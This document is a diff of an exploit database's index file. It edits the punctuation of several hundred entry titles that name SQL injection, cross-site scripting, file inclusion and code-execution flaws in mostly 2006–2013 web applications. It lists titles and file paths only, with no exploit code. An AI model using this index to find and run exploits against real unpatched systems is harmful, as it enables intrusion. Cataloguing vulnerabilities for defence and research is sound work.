-30438,7 +30440,7 @@ id,file,description,date,author,platform,type,port 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 28390,platforms/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusion",2006-08-15,Crackers_Child,php,webapps,0 -28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 +28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 'autoload_func.php autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0 28396,platforms/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 @@ -30447,7 +30449,7 @@ id,file,description,date,author,platform,type,port 28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 -28409,platforms/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 +28409,platforms/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php onlyforuser' Parameter SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 @@ -30480,8 +30482,8 @@ id,file,description,date,author,platform,type,port 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - 'admin/newsletters.php' page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - 'admin/orders_status.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - 'admin/products_attributes.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - 'admin/orders_status.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - 'admin/products_attributes.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28464,platforms/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 28465,platforms/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 28466,platforms/php/webapps/28466.txt,"Learn.com - Learncenter.asp Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 @@ -30579,7 +30581,7 @@ id,file,description,date,author,platform,type,port 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - admin/inc/footer.inc.php Multiple Parameter Cross-Site Scripting",2006-09-14,"HACKERS PAL",php,webapps,0 28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 - admin/inc/header.inc.php Multiple Parameter Cross-Site Scripting",2006-09-14,"HACKERS PAL",php,webapps,0 -28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php' 'Username' Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 +28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php Username' Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusion",2006-09-14,"Saudi Hackrz",php,webapps,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - default.asp SQL Injection",2006-09-14,ajann,asp,webapps,0 @@ -30648,7 +30650,7 @@ id,file,description,date,author,platform,type,port 28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php' 'order_id' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php order_id' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - Cross-Site Request Forgery",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 @@ -30679,9 +30681,9 @@ id,file,description,date,author,platform,type,port 28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS - 'index.php' Multiple Parameter Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS - modules/pageedit/index.php pageid Parameter Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x - '/admin/nav.php' Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - '/admin/image.php' 'image' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - '/admin/image.php image' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - '/admin/header.inc.php' Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - '/footer.inc.php' 'la_pow_by' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - '/footer.inc.php la_pow_by' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28729,platforms/php/webapps/28729.txt,"phpBB XS 0.58 - Multiple Remote File Inclusion",2006-09-30,xoron,php,webapps,0 28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 - details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 @@ -30711,20 +30713,20 @@ id,file,description,date,author,platform,type,port 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0 28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - Calendar.asp Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0 -28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - 'admin/banner_manager.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - 'admin/banner_statistics.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - 'admin/countries.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - 'admin/currencies.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - 'admin/languages.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - 'admin/manufacturers.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - 'admin/products_expected.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - 'admin/reviews.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - 'admin/specials.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - 'admin/stats_products_purchased.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - 'admin/stats_products_viewed.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - 'admin/tax_classes.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - 'admin/tax_rates.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - 'admin/zones.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - 'admin/banner_manager.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - 'admin/banner_statistics.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - 'admin/countries.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - 'admin/currencies.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - 'admin/languages.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - 'admin/manufacturers.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - 'admin/products_expected.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - 'admin/reviews.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - 'admin/specials.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - 'admin/stats_products_purchased.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - 'admin/stats_products_viewed.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - 'admin/tax_classes.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - 'admin/tax_rates.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - 'admin/zones.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica - 'Display.asp' SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps,0 @@ -30732,7 +30734,7 @@ id,file,description,date,author,platform,type,port 28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps,0 28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 -28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0 +28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - 'ISEARCH_PATH' Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0 28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 @@ -30808,7 +30810,7 @@ id,file,description,date,author,platform,type,port 28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 - fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 - fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28875,platforms/php/webapps/28875.txt,"Freenews 1.1 - 'Aff_News.php' Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 -28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php' 'Username' Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 +28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php Username' Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0 28881,platforms/php/webapps/28881.txt,"Foresite CMS - Index_2.php Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0 28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 - Htmlarea.php Cross-Site Scripting",2005-10-30,Vigilon,php,webapps,0 @@ -30882,7 +30884,7 @@ id,file,description,date,author,platform,type,port 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 -28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php' 'sondage' Parameter SQL Injection",2013-10-15,drone,php,webapps,80 +28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage' Parameter SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,ios,webapps,0 @@ -30994,10 +30996,10 @@ id,file,description,date,author,platform,type,port 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 -29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php' 'msg' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - '/admin/comments.php' 'month' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - '/admin/entries.php' 'month' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 - '/admin/logs.php' 'page' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php msg' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - '/admin/comments.php month' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - '/admin/entries.php month' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 - '/admin/logs.php page' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 29103,platforms/asp/webapps/29103.txt,"vSpin Classified System 2004 - cat.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29104,platforms/asp/webapps/29104.txt,"vSpin Classified System 2004 - search.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29105,platforms/asp/webapps/29105.txt,"vSpin Classified System 2004 - cat.asp catname Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -31088,7 +31090,7 @@ id,file,description,date,author,platform,type,port 29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,php,webapps,0 29237,platforms/php/webapps/29237.txt,"cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps,0 29238,platforms/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps,0 -29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp' 'hata' Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 +29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp hata' Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 29241,platforms/asp/webapps/29241.txt,"MaviPortal - Arama.asp Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps,0 29242,platforms/php/webapps/29242.txt,"Messageriescripthp 2.0 - lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29243,platforms/php/webapps/29243.txt,"Messageriescripthp 2.0 - existepseudo.php pseudo Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 @@ -31143,7 +31145,7 @@ id,file,description,date,author,platform,type,port 30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 - comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 - comersus_customerAuthenticateForm.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 29330,platforms/php/webapps/29330.txt,"WordPress Theme Switchblade 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 -29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Function Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0 +29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0 29332,platforms/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - 'Grup' Parameter SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0 40370,platforms/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 @@ -31193,10 +31195,10 @@ id,file,description,date,author,platform,type,port 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0 29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0 29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0 -29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - 'edittag.cgi' 'file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - 'edittag.pl' 'file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 - 'edittag_mp.cgi' 'file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 - 'edittag_mp.pl' 'file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - 'edittag.cgi file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - 'edittag.pl file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 - 'edittag_mp.cgi file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 - 'edittag_mp.pl file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 29394,platforms/cgi/webapps/29394.txt,"EditTag 1.2 - mkpw_mp.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 - mkpw.pl plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 - mkpw.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 @@ -31300,7 +31302,7 @@ id,file,description,date,author,platform,type,port 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 29516,platforms/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps,0 -29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php' 'objectId' Parameter SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 +29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php objectId' Parameter SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 @@ -31430,8 +31432,8 @@ id,file,description,date,author,platform,type,port 29698,platforms/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php' nid Parameter Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 29700,platforms/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps,0 29701,platforms/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - 'wp-includes/theme.php' 'iz' Parameter Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Parameter SQL Injection",2007-02-26,CorryL,php,webapps,0 +29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - 'wp-includes/theme.php iz' Parameter Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php s' Parameter SQL Injection",2007-02-26,CorryL,php,webapps,0 29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 @@ -31478,7 +31480,7 @@ id,file,description,date,author,platform,type,port 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0 29782,platforms/php/webapps/29782.txt,"Satel Lite - 'Satellite.php' Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 -29786,platforms/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 +29786,platforms/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php d' Parameter Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0 30105,platforms/php/webapps/30105.txt,"WordPress Plugin Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 